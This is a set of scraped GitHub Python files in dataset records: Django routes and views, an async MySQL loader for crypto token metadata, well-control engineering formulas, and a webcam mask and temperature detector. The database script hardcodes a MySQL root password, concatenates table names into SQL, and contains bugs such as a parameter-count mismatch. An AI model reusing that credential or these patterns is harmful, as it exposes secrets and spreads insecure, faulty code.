FinanceiroDetalhesView.as_view(), name=\"contas\"),\n path(\"folguinha/\", FolguinhaView.as_view(), name=\"folguinha\"),\n path(\"fornecedores/\", FornecedoresView.as_view(), name=\"lista_fornecedores\"),\n path(\"fornecedores//\", FornecedoresDetalhesView.as_view(), name=\"detalhes_fornecedores\"),\n path(\"hierarquia/\", HierarquiaView.as_view(), name=\"hierarquia\"),\n path(\"inscricao/\", InscricaoView.as_view(), name = \"inscricao\"),\n path(\"\", IndexView.as_view(), name=\"index\"),\n path(\"juridicos/\", JuridicoView.as_view(), name = \"juridicos\"),\n path(\"momentos/\", MomentoImportanteView.as_view(), name=\"MomentoImportante\"),\n path(\"newsletters/\", NewsletterView.as_view(), name=\"newsletter\"),\n path(\"palestra/\", PalestraView.as_view(), name=\"palestras\"),\n path(\"premiacao/\", PremiacaoView.as_view(), name=\"premiacoes\"),\n path(\"projetos/\", ProjetoView.as_view(), name=\"lista_projeto\"),\n path(\"projetos//\", ProjetoDetalhesView.as_view(), name=\"detalhes_projeto\"),\n path(\"promocao/\", PromocaoView.as_view(), name=\"promocao\"),\n path(\"propostas/\", PropostaView.as_view(), name=\"lista_proposta\"),\n path(\"propostas//\", PropostaDetalhesView.as_view(), name=\"detalhes_proposta\"),\n path(\"resultados/\", ResultadoCanalView.as_view(), name=\"resultadoscanais\"),\n path(\"tipo-projeto/\", TipoProjetoView.as_view(), name=\"lista_TipoProjeto\"),\n 
path(\"workshop/\", WorkshopView.as_view(), name=\"workshop\"),\n path(\"visao/\", VisaoView.as_view(), name=\"visao\"),\n path(\"login/\", LoginShootView.as_view(), name=\"login\"),\n path(\"logout/\", LogoutShootView.as_view(), name=\"logout\"),\n]\n","repo_name":"ascartazzini/heyshoot","sub_path":"rh/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74373123680","text":"import coin_marketcap.metadata_api as cmc_api\nimport asyncio\nimport json\nimport aiomysql\n\nimport sys\nsys.path.append('./')\n\nDB_IN_USED = 'cmc_token2'\nloop = asyncio.get_event_loop()\nresult = None\n\n#########################################################################\n# get the async connection to the database\n# @param loop: the event loop\n#\n\n\nasync def get_connection_to_database(loop):\n\n # Connect to the database\n connection = await aiomysql.connect(\n host='localhost',\n user='root',\n password='wewemaylalong2A!',\n loop=loop,\n )\n async with connection.cursor() as cursor:\n await cursor.execute(\"CREATE DATABASE IF NOT EXISTS %s\" % (DB_IN_USED,))\n await cursor.execute(\"USE %s\" % (DB_IN_USED,))\n await connection.commit()\n return connection\n\n#\n# get the async connection POOL to the database\n#\n\n\nasync def get_pool_connection(loop):\n pool = await aiomysql.create_pool(\n host='localhost',\n user='root',\n password='wewemaylalong2A!',\n loop=loop,\n db='%s' % (DB_IN_USED,),\n )\n\n return pool\n\n#########################################################################\n\n# init database\n\n\nasync def cmc_init_database(loop, name=''):\n # Connect to the database\n con = await get_connection_to_database(loop)\n if name == None:\n name = ''\n # delete the table if it exists\n # create a new ones\n async with con.cursor() as cursor:\n await cursor.execute(\"DROP TABLE IF EXISTS cmc_metadata;\")\n await cursor.execute(\"DROP TABLE IF EXISTS cmc_price;\")\n await cursor.execute('''\n CREATE TABLE %scmc_metadata (\n id INT PRIMARY KEY, \n name VARCHAR(255), \n symbol VARCHAR(255), \n slug VARCHAR(255), \n cmc_rank INT, \n is_active INT, \n first_historical_data VARCHAR(255),\n last_historical_data VARCHAR(255),\n platform INT,\n token_address VARCHAR(255)\n )\n ''' % (name,))\n await cursor.execute('''\n CREATE TABLE %scmc_price (\n id INT PRIMARY KEY,\n num_market_pair INT,\n circulating_supply INT,\n total_supply INT,\n max_supply INT,\n last_updated VARCHAR(255),\n date_added VARCHAR(255),\n usd_price FLOAT,\n usd_volume_24h FLOAT,\n percent_change_1h FLOAT,\n percent_change_24h FLOAT,\n percent_change_7d FLOAT,\n market_cap FLOAT,\n fully_diluted_market_cap FLOAT\n )''' % (name, ))\n await con.commit()\n\n con.close()\n\n\nasync def call_fill_to_metadata(loop):\n packet_of_data = cmc_api.get_active_token_metadata()\n loop.run_until_complete(fill_to_metadata(loop, packet_of_data))\n print('Completed filling to metadata: active token')\n\n packet_of_data = cmc_api.get_inactive_token_metadata()\n loop.run_until_complete(fill_to_metadata(loop, packet_of_data))\n print('Completed filling to metadata: inactive token')\n\n packet_of_data = cmc_api.get_untracked_token_metadata()\n loop.run_until_complete(fill_to_metadata(loop, packet_of_data))\n print('Completed filling to metadata: untracked token')\n\n# fill data from the API to the database\n\n\nasync def fill_to_metadata(loop, data: list, db_name: str = 'cmc_metadata'):\n pool = await 
get_pool_connection(loop)\n # Get the data from the API\n\n async with pool.acquire() as con:\n print('\\n\\n', len(data), '\\n')\n for token in data:\n cursor = await con.cursor()\n # Get the data from the API\n id = token['id']\n name = token['name']\n symbol = token['symbol']\n slug = token['slug']\n cmc_rank = token['rank']\n is_active = token['is_active']\n try: \n first_historical_data = token['first_historical_data']\n last_historical_data = token['last_historical_data']\n except Exception:\n first_historical_data = None\n last_historical_data = None\n if token['platform'] is None:\n platform = -1\n token_address = None\n else:\n platform = token['platform']['id']\n token_address = token['platform']['token_address']\n\n # Insert the data into the database\n await cursor.execute('''\n INSERT INTO '''+ db_name +''' VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);''',\n (id, name, symbol, slug, cmc_rank, is_active,\n first_historical_data, last_historical_data, platform, token_address,))\n print('Insert %s %s %s' % (id, name, symbol))\n await con.commit()\n pool.close()\n await pool.wait_closed()\n\n\nasync def fill_to_price(loop, db_name='cmc_price'):\n pool = await get_pool_connection(loop)\n # Get the data from the API\n data = cmc_api.get_token_price_from_cmc()\n\n async with pool.acquire() as con:\n print('\\n\\n', len(data), '\\n')\n for token in data:\n cursor = await con.cursor()\n # Get the data from the API\n id = token['id']\n num_market_pair = token['num_market_pairs']\n circulating_supply = token['circulating_supply']\n total_supply = token['total_supply']\n max_supply = token['max_supply']\n last_updated = token['last_updated']\n date_added = token['date_added']\n usd_price = token['quote']['USD']['price']\n usd_volume_24h = token['quote']['USD']['volume_24h']\n percent_change_1h = token['quote']['USD']['percent_change_1h']\n percent_change_24h = token['quote']['USD']['percent_change_24h']\n percent_change_7d = token['quote']['USD']['percent_change_7d']\n market_cap = token['quote']['USD']['market_cap']\n fully_diluted_market_cap = token['quote']['USD']['fully_diluted_market_cap']\n # Insert the data into the database\n await cursor.execute('''\n INSERT INTO ''' + db_name + ''' VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)''', (db_name, id, num_market_pair, circulating_supply, total_supply, max_supply, last_updated, date_added,\n float(usd_price), float(usd_volume_24h), float(\n percent_change_1h), float(percent_change_24h),\n float(percent_change_7d), float(market_cap), float(fully_diluted_market_cap),))\n await con.commit()\n pool.close()\n await pool.wait_closed()\n\n# run SELECT query on the database\n# return something based on the params\n\n\nasync def get_metadata(loop, id='', token_address: str = '', name: str = '', symbol: str = ''):\n global result\n con = await get_connection_to_database(loop)\n async with con.cursor() as cursor:\n if id is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE id = %s''', (id,))\n elif token_address is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE token_address = %s''', (token_address,))\n elif name is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE name = %s''', (name,))\n elif symbol is not None:\n await cursor.execute('''\n SELECT * FROM cmc_metadata WHERE symbol = %s''', (symbol,))\n else:\n await cursor.execute('''\n SELECT * FROM cmc_metadata''')\n result = await cursor.fetchall()\n await con.commit()\n con.close()\n\n\n# run SELECT 
query on the database\n# return price of the token based on id\nasync def get_price(loop, id: str):\n global result\n con = await get_connection_to_database(loop)\n async with con.cursor() as cursor:\n await cursor.execute('''\n SELECT * FROM cmc_price WHERE id = %s''', (id,))\n result = await cursor.fetchall()\n await con.commit()\n con.close()\n\n# update the database with the new data\n\n\nasync def update_metadata(loop, token_metadata):\n con = get_connection_to_database(loop)\n async with con.cursor() as cursor:\n await cursor.execute('''\n UPDATE cmc_metadata SET name = %s, symbol = %s, slug = %s, cmc_rank = %s, is_active = %s, first_historical_data = %s, last_historical_data = %s, platform = %s, token_address = %s WHERE id = %s''',\n (token_metadata['name'], token_metadata['symbol'], token_metadata['slug'], token_metadata['cmc_rank'], token_metadata['is_active'], token_metadata['first_historical_data'], token_metadata['last_historical_data'], token_metadata['platform'], token_metadata['token_address'], token_metadata['id']))\n await con.commit()\n con.close()\n\n\nasync def change_name(loop):\n con = get_connection_to_database(loop)\n async with con.cursor() as cursor:\n await cursor.execute('''\n ALTER TABLE cmc_metadata RENAME TO backup_cmc_metadata;\n ALTER TABLE new_cmc_metadata RENAME TO cmc_metadata;\n ALTER TABLE cmc_price RENAME TO backup_cmc_price;\n ALTER TABLE new_cmc_price RENAME TO cmc_price;\n ''')\n await con.commit()\n con.close()\n\n\nasync def backup(loop, db: list):\n con = get_connection_to_database(loop)\n async with con.cursor() as cursor:\n if db.index('cmc_metadata') != -1:\n await cursor.execute('''\n ALTER TABLE cmc_metadata RENAME TO error_cmc_metadata;\n ALTER TABLE backup_cmc_metadata RENAME TO cmc_metadata;\n DROP TABLE error_cmc_metadata;\n ''')\n await con.commit()\n if db.index('cmc_price') != -1:\n await cursor.execute('''\n ALTER TABLE cmc_price RENAME TO error_cmc_price;\n ALTER TABLE backup_cmc_price RENAME TO cmc_price;\n DROP TABLE error_cmc_price; ''')\n await con.commit()\n con.close()\n\n\ndef get_result():\n return result\n\n\ndef clear_result():\n global result\n result = None\n","repo_name":"auditrate-tech/detect-scam","sub_path":"database/cmc_db.py","file_name":"cmc_db.py","file_ext":"py","file_size_in_byte":10594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6532475405","text":"from urllib import quote_plus\n\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom .forms import HomeForm\nfrom .models import Home\n\n# Create your views here.\n\n\ndef home_create(request):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tform = HomeForm(request.POST or None, request.FILES or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.user = request.user\n\t\tinstance.save()\n\t\tmessages.success(request, \"Successfully Created\")\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\tcontext = {\n\t\t\"form\": form,\n\t}\n\treturn render(request, \"home_form.html\", context)\n\ndef home_detail(request, slug=None):\n\tinstance = get_object_or_404(Home, slug=slug) \n\tif instance.publish > timezone.now().date() or instance.draft:\n\t\tif not 
request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tshare_string = quote_plus(instance.about_home)\n\tcontext = {\n\t\"title\": \"Single Template\",\n\t\"instance\": instance,\n\t\"share_string\": share_string,\n\t}\n\treturn render(request, \"single_home.html\", context)\n\ndef home_list(request):\n\ttoday = timezone.now().date()\n\tqueryset_list = Home.objects.active()\n\tif request.user.is_staff or request.user.is_superuser:\n\t\tqueryset_list = Home.objects.all()\n\tquery = request.GET.get(\"q\")\n\tif query:\n\t\tqueryset_list = queryset_list.filter(\n\t\t\t\tQ(home_name__icontains=query)|\n\t\t\t\tQ(about_home__icontains=query)|\n\t\t\t\tQ(email__icontains=query)|\n\t\t\t\tQ(managers_name__icontains=query)|\n\t\t\t\t# Q(about_home__icontains=query)|\n\t\t\t\tQ(phone_number__icontains=query)|\n\t\t\t\tQ(managers_id_no__icontains=query)\n\t\t\t\t# Q(about_manager__icontains=query)|\n\t\t\t\t# Q(county__icontains=query)|\n\t\t\t\t# Q(constituency__icontains=query)|\n\t\t\t\t# Q(ward__icontains=query)|\n\t\t\t\t# Q(children_gender__icontains=query)|\n\t\t\t\t# Q(user__first_name__icontains=query) |\n\t\t\t\t# Q(user__last_name__icontains=query)\n\t\t\t\t).distinct()\n\tpaginator = Paginator(queryset_list, 8) # Show 25 contacts per page\n\tpage_request_var = \"search\"\n\tpage = request.GET.get(page_request_var)\n\ttry:\n\t\tqueryset = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\t# If page is not an integer, deliver first page.\n\t\tqueryset = paginator.page(1)\n\texcept EmptyPage:\n\t\t# If page is out of range (e.g. 9999), deliver last page of results.\n\t\tqueryset = paginator.page(paginator.num_pages)\n\tcontext = {\n\t\"object_list\": queryset,\n\t\"title\": \"List\",\n\t\"page_request_var\": page_request_var,\n\t\"today\": today,\n\t}\n\treturn render(request, \"home.html\", context)\n\t\ndef home_update(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tinstance = get_object_or_404(Home, slug=slug) \n\tform = HomeForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"The home was changed successfully.\")\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\tcontext = {\n\t\"title\": \"Edit\",\n\t\"instance\": instance,\n\t\"form\": form,\n\t}\n\treturn render(request, \"home_form.html\", context)\n\ndef home_delete(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tinstance = get_object_or_404(Home, slug=slug)\n\tinstance.delete()\n\tmessages.success(request, \"Successfully Deleted\")\n\treturn redirect(\"list\")\n\ndef about(request):\n\tcontext = {}\n\ttemplate = 'about.html'\n\treturn render(request,template,context)\n\ndef team(request):\n\tcontext = {}\n\ttemplate = 'team.html'\n\treturn render(request,template,context)\n\ndef developers(request):\n\tcontext = {}\n\ttemplate = 'developers.html'\n\treturn render(request,template,context)\n\ndef contact(request):\n\tcontext = {}\n\ttemplate = 'contact.html'\n\treturn render(request,template,context)","repo_name":"Bujj/IDonate-hub","sub_path":"donate/src/homes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7196284018","text":"import drilling as dri\nimport force_and_power as fap\nimport fluid as 
flu\nimport general as gen\nimport production as pro\nimport math\n\n\ndef gas_migration_rate(pressure_value, pressure_units, mud_value, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n mud_weight = dri.mud_weight(mud_value, mud_units)\n migration_rate = pressure['psi'] / (mud_weight['ppg'] * 0.052)\n return fap.velocity(migration_rate, 'ft/hr')\n\n\ndef max_shutin_casing_pressure(pressure_value, pressure_units,\n tvd_value, depth_units,\n original_mud_value,\n current_mud_value, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n original_mud = dri.mud_weight(original_mud_value, mud_units)\n current_mud = dri.mud_weight(current_mud_value, mud_units)\n tvd = gen.length(tvd_value, depth_units)\n new_pressure = pressure['psi'] - (tvd['ft'] *\n (current_mud['ppg'] -\n original_mud['ppg']) * 0.052)\n return gen.pressure(new_pressure, 'psi')\n\n\ndef influx_height(gain_value, volume_units, annular_value, annular_units):\n gain = gen.volume(gain_value, volume_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n influx_height = gain['bbl']/annular_capacity['bbl/ft']\n return gen.length(influx_height, 'ft')\n\n\ndef gas_migration_estimation(mud_value, mud_units):\n mud_weight = dri.mud_weight(mud_value, mud_units)\n migration_rate = 12 * math.exp(-0.37 * mud_weight['ppg'])\n return fap.velocity(migration_rate, 'ft/s')\n\n\ndef influx_type_estimation(casing_pressure, pipe_pressure, pressure_units,\n influx_height, height_units,\n mud_value, mud_units):\n casing_pressure = gen.pressure(casing_pressure, pressure_units)\n pipe_pressure = gen.pressure(pipe_pressure, pressure_units)\n influx_height = gen.length(influx_height, height_units)\n mud_weight = dri.mud_weight(mud_value, mud_units)\n influx_weight = (mud_weight['ppg'] -\n ((casing_pressure['psi'] -\n pipe_pressure['psi']) /\n (0.052 * influx_height['ft'])))\n influx_type = 'Gas Influx'\n if 3 < influx_weight <= 7:\n influx_type = 'Oil Influx or Combination Oil and Gas kick'\n elif influx_weight > 7:\n influx_type = 'Water Kick'\n return {'influx_weight': dri.mud_weight(influx_weight, 'ppg'),\n 'influx_type': influx_type}\n\n\ndef final_circulating_pressure(pressure_value, pressure_units, kill_mud,\n original_mud, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n kill_mud = dri.mud_weight(kill_mud, mud_units)\n original_mud = dri.mud_weight(original_mud, mud_units)\n circulating_pressure = (pressure['psi'] * kill_mud['ppg'] /\n original_mud['ppg'])\n return gen.pressure(circulating_pressure, 'psi')\n\n\ndef inital_circulating_pressure(scr_value, sidpp_value, pressure_units):\n scr_pressure = gen.pressure(scr_value, pressure_units)\n sidpp_pressure = gen.pressure(sidpp_value, pressure_units)\n return gen.pressure(scr_pressure['psi'] + sidpp_pressure['psi'], 'psi')\n\n\ndef formation_pressure_kick_analysis(sidpp_value, pressure_units,\n tvd_value, depth_units,\n mud_value, mud_units):\n sidpp_value = gen.pressure(sidpp_value, pressure_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd = gen.length(tvd_value, depth_units)\n formation_pressure = sidpp_value['psi'] + (0.052 * tvd['ft'] * mud['ppg'])\n return gen.pressure(formation_pressure, 'psi')\n\n\ndef pressure_loss_gas_cut(mud_value, mud_units, annular_value, annular_units,\n gain_value, gain_units):\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n pit_gain = gen.volume(gain_value, gain_units)\n pressure_loss = ((mud['ppg'] * 0.052) 
/\n annular_capacity['bbl/ft']) * pit_gain['bbl']\n return gen.pressure(pressure_loss, 'psi')\n\n\ndef kick_penetration_pressure_increase(gain_value, gain_units, mud_value,\n kick_value, mud_units, hole_id_value,\n bha_od_value, pipe_od_value, dia_value,\n bha_length, length_units):\n pit_gain = gen.volume(gain_value, gain_units)\n mud = dri.mud_weight(mud_value, mud_units)\n kick = dri.mud_weight(kick_value, mud_units)\n hole_id = gen.length(hole_id_value, dia_value)\n bha_od = gen.length(bha_od_value, dia_value)\n pipe_od = gen.length(pipe_od_value, dia_value)\n bha = gen.length(bha_length, length_units)\n hole_capacity = hole_id['in']**2 / 1029.4\n annular_capacity_bha = (hole_id['in']**2 - bha_od['in']**2)/1029.4\n annular_capacity_pipe = (hole_id['in']**2 - pipe_od['in']**2)/1029.4\n kick_height_hole = pit_gain['bbl'] / hole_capacity\n kick_height_annulus = 0\n if annular_capacity_bha * bha['ft'] > pit_gain['bbl']:\n kick_height_annulus = pit_gain['bbl'] / annular_capacity_bha\n else:\n kick_height_annulus = (bha['ft'] + ((pit_gain['bbl'] -\n (annular_capacity_bha *\n bha['ft'])) /\n annular_capacity_pipe))\n casing_pressure_increase = ((kick_height_annulus - kick_height_hole) *\n 0.052 * (mud['ppg'] - kick['ppg']))\n return gen.pressure(casing_pressure_increase, 'psi')\n\n\ndef kick_tolerance_factor(shoe_value, tvd_value, depth_units,\n max_mud_value, mud_value, mud_units):\n shoe_value = gen.length(shoe_value, depth_units)\n tvd_value = gen.length(tvd_value, depth_units)\n max_mud = dri.mud_weight(max_mud_value, mud_units)\n mud = dri.mud_weight(mud_value, mud_units)\n ktf = (shoe_value['ft'] / tvd_value['ft']) * (max_mud['ppg'] - mud['ppg'])\n return dri.mud_weight(ktf, 'ppg')\n\n\ndef kill_mud_weight(pressure_value, pressure_units, mud_value, mud_units,\n tvd_value, depth_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd_value = gen.length(tvd_value, depth_units)\n kill_mud_weight = (mud['ppg'] + (pressure['psi'] /\n (0.052 * tvd_value['ft'])))\n return dri.mud_weight(kill_mud_weight, 'ppg')\n\n\n# lube increment and mud increment\ndef fluid_increment(pressure_value, pressure_units,\n casing_id_value, pipe_od_value, dia_units,\n mud_value, mud_units):\n pressure = gen.pressure(pressure_value, pressure_units)\n casing_id = gen.length(casing_id_value, dia_units)\n pipe_od = gen.length(pipe_od_value, dia_units)\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = (casing_id['in']**2 - pipe_od['in']**2) / 1029.4\n lube_increment = pressure['psi'] * annular_capacity / (0.052 * mud['ppg'])\n return {'annular_capacity': pro.pipe_capacity(annular_capacity, 'bbl/ft'),\n 'lube_increment': gen.volume(lube_increment, 'bbl')}\n\n\ndef max_formation_pressure(kick_factor, mud_value, mud_units,\n tvd_value, depth_units):\n kick_factor = dri.mud_weight(kick_factor, mud_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd_value = gen.length(tvd_value, depth_units)\n max_formation_pressure = (0.052 * (kick_factor['ppg'] + mud['ppg']) *\n tvd_value['ft'])\n return gen.pressure(max_formation_pressure, 'psi')\n\n\ndef max_influx_height(casing_pressure, pressure_units, mud_value,\n influx_value, gradient_units):\n masicp = gen.pressure(casing_pressure, pressure_units)\n mud = dri.pressure_grad(mud_value, gradient_units)\n influx = dri.pressure_grad(influx_value, gradient_units)\n return gen.length((masicp['psi'] / (mud['psi/ft'] -\n influx['psi/ft'])), 'ft')\n\n\ndef misicp(lot_value, mud_value, mud_units, tvd_value, 
depth_units):\n lot = dri.mud_weight(lot_value, mud_units)\n mud = dri.mud_weight(mud_value, mud_units)\n tvd_value = gen.length(tvd_value, depth_units)\n max_formation_pressure = (0.052 * (lot['ppg'] - mud['ppg']) *\n tvd_value['ft'])\n return gen.pressure(max_formation_pressure, 'psi')\n\n\ndef max_pit_gain_gas_kick_wbm(pressure_value, pressure_units,\n pit_gain, volume_units,\n mud_value, mud_units,\n annular_value, annular_units):\n formation_pressure = gen.pressure(pressure_value, pressure_units)\n gain = gen.volume(pit_gain, volume_units)\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n max_gain = 4 * (((formation_pressure['psi'] * gain['bbl'] *\n annular_capacity['bbl/ft'] / mud['ppg']))**0.5)\n return gen.volume(max_gain, 'bbl')\n\n\ndef max_surface_pressure_gas_influx_wbm(pressure_value, pressure_units,\n pit_gain, volume_units,\n mud_value, mud_units,\n annular_value, annular_units):\n formation_pressure = gen.pressure(pressure_value, pressure_units)\n gain = gen.volume(pit_gain, volume_units)\n mud = dri.mud_weight(mud_value, mud_units)\n annular_capacity = pro.pipe_capacity(annular_value, annular_units)\n max_pressure = 0.2 * ((formation_pressure['psi'] * gain['bbl'] *\n mud['ppg'] / annular_capacity['bbl/ft']))**0.5\n return gen.pressure(max_pressure, 'psi')\n\n\ndef max_surface_pressure_kick_tolerance(mud_value, mud_units,\n tvd_value, depth_units):\n kick_factor = dri.mud_weight(mud_value, mud_units)\n tvd = gen.length(tvd_value, depth_units)\n return gen.pressure(0.052 * kick_factor['ppg'] * tvd['ft'], 'psi')\n\n\ndef new_mud_pressure_loss(pressure_value, pressure_units, old_value,\n new_value, mud_units):\n pressure_loss = gen.pressure(pressure_value, pressure_units)\n old_mud = dri.mud_weight(old_value, mud_units)\n new_mud = dri.mud_weight(new_value, mud_units)\n return gen.pressure(pressure_loss['psi'] * new_mud['ppg'] /\n old_mud['ppg'], 'psi')\n\n\ndef new_strokes_pump_pressure(pressure_value, pressure_units,\n old_stokes, new_stokes):\n pressure_loss = gen.pressure(pressure_value, pressure_units)\n return gen.pressure(pressure_loss['psi'] * (new_stokes /\n old_stokes)**2, 'psi')\n\n\ndef riser_margin(air_gap, water_depth, tvd_value, depth_units,\n mud_value, water_value, mud_units):\n mud = dri.mud_weight(mud_value, mud_units)\n water = dri.mud_weight(water_value, mud_units)\n air_gap = gen.length(air_gap, depth_units)\n water_depth = gen.length(water_depth, depth_units)\n tvd = gen.length(tvd_value, depth_units)\n return dri.mud_weight(((air_gap['ft'] +\n water_depth['ft']) *\n mud['ppg'] -\n (water_depth['ft'] *\n water['ppg'])) /\n (tvd['ft'] -\n air_gap['ft'] - water_depth['ft']), 'ppg')\n\n\ndef time_penetrate_kick(kick_depth, bit_depth, depth_units,\n migration_value, stripping_value, velocity_units):\n kick_depth = gen.length(kick_depth, depth_units)\n bit_depth = gen.length(bit_depth, depth_units)\n migration = fap.velocity(migration_value, velocity_units)\n stripping = fap.velocity(stripping_value, velocity_units)\n return gen.time((kick_depth['ft'] - bit_depth['ft']) /\n (migration['ft/hr'] + stripping['ft/hr']), 'hr')\n\n\ndef trip_margin(yield_value, yield_units, hole_id, pipe_od, dia_units):\n yield_point = flu.fluid_yield_point(yield_value, yield_units)\n hole_id = gen.length(hole_id, dia_units)\n pipe_od = gen.length(pipe_od, dia_units)\n return dri.mud_weight(yield_point['lbf/100ft2'] /\n ((11.7 * (hole_id['in'] - pipe_od['in']))), 'ppg')\n\n\ndef 
accumulator_bottle_capacity_required(volume_value, volume_units,\n pre_charge_value, minimum_value,\n operating_value, pressure_units):\n required_volume = gen.volume(volume_value, volume_units)\n pre_charge = gen.pressure(pre_charge_value, pressure_units)\n operating = gen.pressure(operating_value, pressure_units)\n minimum = gen.pressure(minimum_value, pressure_units)\n usable_volume = (required_volume['gal_us'] /\n ((pre_charge['psi'] /\n minimum['psi']) -\n (pre_charge['psi'] / operating['psi'])))\n return gen.volume(usable_volume, 'gal_us')\n","repo_name":"this-isnt-me/ogPypeline","sub_path":"ogPypeline/well_control_formulas.py","file_name":"well_control_formulas.py","file_ext":"py","file_size_in_byte":13204,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"86441830973","text":"import cv2\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport time,sys\nimport amg8833_i2c\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\nmodel = load_model(\"maskerfix1.h5\")\n\n\nt0 = time.time()\nsensor = []\nwhile (time.time()-t0)<1: # wait 1sec for sensor to start\n try:\n # AD0 = GND, addr = 0x68 | AD0 = 5V, addr = 0x69\n sensor = amg8833_i2c.AMG8833(addr=0x69) # start AMG8833\n except:\n sensor = amg8833_i2c.AMG8833(addr=0x68)\n finally:\n pass\ntime.sleep(0.1) # wait for sensor to settle\nif sensor==[]:\n print(\"No AMG8833 Found - Check Your Wiring\")\n sys.exit(); # exit the app if AMG88xx is not found \n\n\npix_res = (8,8) # pixel resolution\nxx,yy = (np.linspace(0,pix_res[0],pix_res[0]),\n np.linspace(0,pix_res[1],pix_res[1]))\nzz = np.zeros(pix_res) # set array with zeros first\n# new resolution\npix_mult = (20,15) # multiplier for interpolation \ninterp_res = (int(pix_mult[0]*pix_res[0]),int(pix_mult[1]*pix_res[1]))\ngrid_x,grid_y = (np.linspace(0,pix_res[0],interp_res[0]),\n np.linspace(0,pix_res[1],interp_res[1]))\n# interp function\ndef interp(z_var):\n # cubic interpolation on the image\n # at a resolution of (pix_mult*8 x pix_mult*8)\n f = interpolate.interp2d(xx,yy,z_var,kind='cubic')\n return f(grid_x,grid_y)\ngrid_z = interp(zz) # interpolated image\n\n\n# face_clsfr=cv2.CascadeClassifier('H:/projek masker/haarcascade_frontalface_default.xml')\nlabels_dict={1:'without_mask',0:'with_mask'}\ncolor_dict={1:(0,0,255),0:(255,0,0)}\n\nsize = 4\nwebcam = cv2.VideoCapture(0) #Use camera 0\n\n# We load the xml file\nclassifier = cv2.CascadeClassifier('haarcascade_frontalface_alt2.xml')\n\npix_to_read = 64 # read all 64 pixels\n\n\nwhile True:\n try:\n (rval, im) = webcam.read()\n # if rval:\n # continue\n # else:\n # sys.exit()\n status,pixels = sensor.read_temp(pix_to_read) # read pixels with status\n \n if status: # if error in pixel, re-enter loop and try again\n continue\n \n T_thermistor = sensor.read_thermistor() # read thermistor temp\n\n # fig.canvas.restore_region(ax_bgnd) # restore background (speeds up run)\n new_z = np.fliplr(interp(np.reshape(pixels,pix_res)))\n # print(new_z)\n im=cv2.flip(im,1,1) #Flip to act as a mirror\n\n # Resize the image to speed up detection\n mini = cv2.resize(im, (im.shape[1] // size, im.shape[0] // size))\n\n # detect MultiScale / faces \n faces = classifier.detectMultiScale(mini)\n\n # Draw rectangles around each face\n for f in faces:\n (x, y, w, h) = [v * size for v in f] #Scale the shapesize backup\n (x1,y1,w1,h1) = f\n #Save just the rectangle faces in SubRecFaces\n face_img = im[y:y+h, x:x+w]\n # face_img = im[x:x+w,y:y+h]\n 
temperature = new_z[x1:x1+w1, y1:y1+h1]\n # print(temperature)\n\n temperature = np.round(np.max(temperature.flatten()),1)\n resized=cv2.resize(face_img,(224,224))\n normalized=resized/255.0\n reshaped=np.reshape(normalized,(1,224,224,3))\n reshaped = np.vstack([reshaped])\n result=model.predict(reshaped)\n #print(result)\n \n label=np.argmax(result,axis=1)[0]\n # print(label)\n \n cv2.rectangle(im,(x,y),(x+w,y+h),color_dict[label],2)\n cv2.rectangle(im,(x,y-40),(x+w,y),color_dict[label],-1)\n cv2.putText(im, \"{},{}C\".format(labels_dict[label],temperature), (x, y-10),cv2.FONT_HERSHEY_SIMPLEX,0.7,(255,255,255),2)\n \n # Show the image\n cv2.imshow('masker', im)\n key = cv2.waitKey(10)\n # if Esc key is press then break out of the loop \n if key == 27: #The Esc key\n break\n except Exception as e:\n print(e)\n# Stop video\nwebcam.release()\n\n# Close all started windows\ncv2.destroyAllWindows()","repo_name":"m4ri01/mask-detection","sub_path":"tesmasker.py","file_name":"tesmasker.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41545641772","text":"import matplotlib\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nfrom flask 